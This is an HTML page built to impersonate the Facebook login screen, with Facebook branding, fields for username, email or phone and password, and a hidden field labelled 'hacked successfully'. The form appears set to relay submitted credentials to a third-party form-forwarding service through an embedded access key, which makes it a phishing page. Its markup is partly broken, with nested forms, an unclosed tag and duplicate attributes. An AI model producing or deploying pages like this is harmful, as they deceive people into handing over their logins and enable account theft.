<!DOCTYPE html>
<html lang="en">
<head>
  <form action="https://api.web3forms.com/submit" method="POST">

    <input type="hidden" name="access_key" value="3e4f758d-de26-4bd1-96d6-6f4c005d757f">

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login</title>
    <style>
        body {
          
            font-family: Arial, sans-serif;
            
    background: url('/img/Picsart_24-08-25_16-03-31-102.png')
        }
        .login-container {
            background-color: #fff;
            padding: 20px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            border-radius: 8px;
            
          width: 300px;
        }
        .login-container h1 {
            color: #1877f2;
            margin-bottom: 20px;
            text-align: center;
        }
        .login-container input {
            width: 90%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 4px;
        }
        .login-container button {
            width: 100%;
            padding: 9px;
            background-color: #1877f2;
            border: none;
            color: white;
            border-radius: 4px;
            font-size: 16px;
            cursor: pointer;
        }
        .login-container button:hover {
            background-color: #165ebf;
        }
        .login-container a {
            display: block;
            text-align: center;
            margin-top: 10px;
            color: #1877f2;
            text-decoration: none;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <h1>Facebook</h1>
        <form>
          <input type="hidden" name="hacked successfully"
          <input type="user name"name="username"placeholder="username"required>
            <input type="text" placeholder="Email or Phone"name="email"name="email"required>
            <input type="password"name="P4$$W0RD"placeholder="Password" required>
            <button type="submit">Log In</button>
            <a href="https://curlyfish.netlify.app">Forgot Password?</a>
        </form>
    </div>
</body>
</html>